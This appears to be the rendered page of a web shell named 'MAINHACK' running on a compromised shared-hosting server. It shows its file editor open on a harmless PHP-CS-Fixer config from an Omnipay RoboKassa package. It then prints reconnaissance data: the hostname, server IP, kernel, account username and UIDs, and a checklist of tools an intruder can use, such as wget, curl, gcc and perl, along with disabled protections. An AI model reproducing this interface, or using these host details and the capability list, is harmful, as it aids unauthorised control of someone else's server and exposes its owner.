[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: .php_cs
<?php $header = <<<EOF RoboKassa driver for Omnipay PHP payment library @link https://github.com/hiqdev/omnipay-robokassa @package omnipay-robokassa @license MIT @copyright Copyright (c) 2015-2017, HiQDev (http://hiqdev.com/) EOF; return PhpCsFixer\Config::create() ->setUsingCache(true) ->setRiskyAllowed(true) ->setRules(array( '@Symfony' => true, 'header_comment' => [ 'header' => $header, 'separate' => 'bottom', 'location' => 'after_declare_strict', 'commentType' => 'PHPDoc', ], 'binary_operator_spaces' => [ 'align_double_arrow' => null, 'align_equals' => null, ], 'concat_space' => ['spacing' => 'one'], 'array_syntax' => ['syntax' => 'short'], 'phpdoc_no_alias_tag' => ['replacements' => ['type' => 'var']], 'blank_line_before_return' => false, 'phpdoc_align' => false, 'phpdoc_scalar' => false, 'phpdoc_separation' => false, 'phpdoc_to_comment' => false, 'method_argument_space' => false, 'ereg_to_preg' => true, 'blank_line_after_opening_tag' => true, 'single_blank_line_before_namespace' => true, 'ordered_imports' => true, 'phpdoc_order' => true, 'pre_increment' => true, 'strict_comparison' => true, 'strict_param' => true, 'no_multiline_whitespace_before_semicolons' => true, )) ->setFinder( PhpCsFixer\Finder::create() ->in(__DIR__) ->notPath('vendor') ->notPath('runtime') ->notPath('web/assets') ) ;
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.85 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285